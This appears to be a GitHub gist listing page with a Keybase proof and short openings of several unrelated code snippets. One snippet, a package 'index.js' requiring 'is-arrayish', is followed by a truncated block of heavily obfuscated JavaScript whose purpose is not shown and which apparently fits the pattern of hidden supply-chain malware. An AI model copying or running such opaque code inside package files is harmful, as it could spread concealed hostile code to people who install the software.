I hereby claim:
- I am 0x2b3bfa0 on github.
- I am 0x2b3bfa0 (https://keybase.io/0x2b3bfa0) on keybase.
- I have a public key ASD1iwpTI9zrRnoA_PMHMzAQk0tpwMXg5j79UNESoZ8JyAo
To claim this, I am signing this object:
| index.js | |
| 'use strict'; | |
| var isArrayish = require('is-arrayish'); | |
| const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66ea25['push'](_0x66ea25['shift']());}}}(_0x550 |
I hereby claim:
To claim this, I am signing this object:
| #include "main.h" | |
| void config_read() { | |
| // configFile = SPIFFS.open("/config.json", "w+"); | |
| size_t size = configFile.size(); | |
| std::unique_ptr<char[]> buf(new char[size]); | |
| DynamicJsonBuffer jsonBuffer; | |
| configFile.readBytes(buf.get(), size); | |
| JsonObject& json = jsonBuffer.parseObject(buf.get()); | |
| const char* brightness = json["brightness"]; |
| #!/usr/bin/env python2 | |
| # vim: set fileencoding=utf8 | |
| import os | |
| import sys | |
| import requests | |
| import urllib | |
| import json | |
| import re | |
| import time |
| ## | |
| ## WPS on OpenWRT | |
| ## This script enables Wi-Fi Protected Setup on OpenWRT. | |
| ## | |
| ## Resources | |
| ## http://wiki.openwrt.org/doc/uci/wireless#wps.options | |
| ## | |
| #Install the full wpad package | |
| opkg update |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #define XLIM 17 | |
| #define YLIM 9 | |
| #define ARSZ (XLIM * YLIM) | |
| #define DEBUG 0 |